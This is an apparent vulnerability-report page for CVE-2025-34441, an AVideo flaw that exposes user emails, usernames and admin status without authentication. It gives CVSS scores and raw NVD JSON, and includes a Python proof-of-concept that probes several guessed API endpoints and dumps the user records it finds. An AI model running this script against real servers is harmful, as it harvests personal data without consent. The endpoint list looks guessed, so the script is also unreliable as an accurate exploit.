Security Vulnerability Report
中文
CVE-2025-34441 CVSS 7.5 HIGH

CVE-2025-34441

Published: 2025-12-17 20:15:55
Last Modified: 2025-12-19 19:15:52
Source: [email protected]

Description

AVideo versions prior to 20.1 expose sensitive user information through an unauthenticated public API endpoint. Responses include emails, usernames, administrative status, and last login times, enabling user enumeration and privacy violations.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
AVideo < 20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-34441 PoC - AVideo Unauthenticated User Information Disclosure # Target: AVideo versions prior to 20.1 def exploit_avideo_user_enum(target_url): """ Exploit for CVE-2025-34441 Unauthenticated API endpoint exposes sensitive user information """ # Common vulnerable endpoints endpoints = [ '/api/v1/users', '/api/users/list', '/plugin/API/users.json', '/view/info.json' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-34441 - AVideo User Information Disclosure\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {endpoint}") try: # No authentication required (PR:N) response = requests.get(url, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Success! Retrieved data from {endpoint}") print(f"[+] Response: {json.dumps(data, indent=2)}") # Check for sensitive fields if isinstance(data, list): for user in data: if 'email' in user or 'username' in user: print(f"[+] User Info: Email={user.get('email')}, " f"Username={user.get('username')}, " f"Admin={user.get('isAdmin')}, " f"LastLogin={user.get('lastLogin')}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") except json.JSONDecodeError: print(f"[-] Invalid JSON response from {endpoint}") print("\n[-] No vulnerable endpoints found") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-avideo-server.com" exploit_avideo_user_enum(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34441", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.690", "lastModified": "2025-12-19T19:15:51.737", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 expose sensitive user information through an unauthenticated public API endpoint. Responses include emails, usernames, administrative status, and last login times, enabling user enumeration and privacy violations."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/1416c517e2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-user-information-disclosure-via-public-api", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.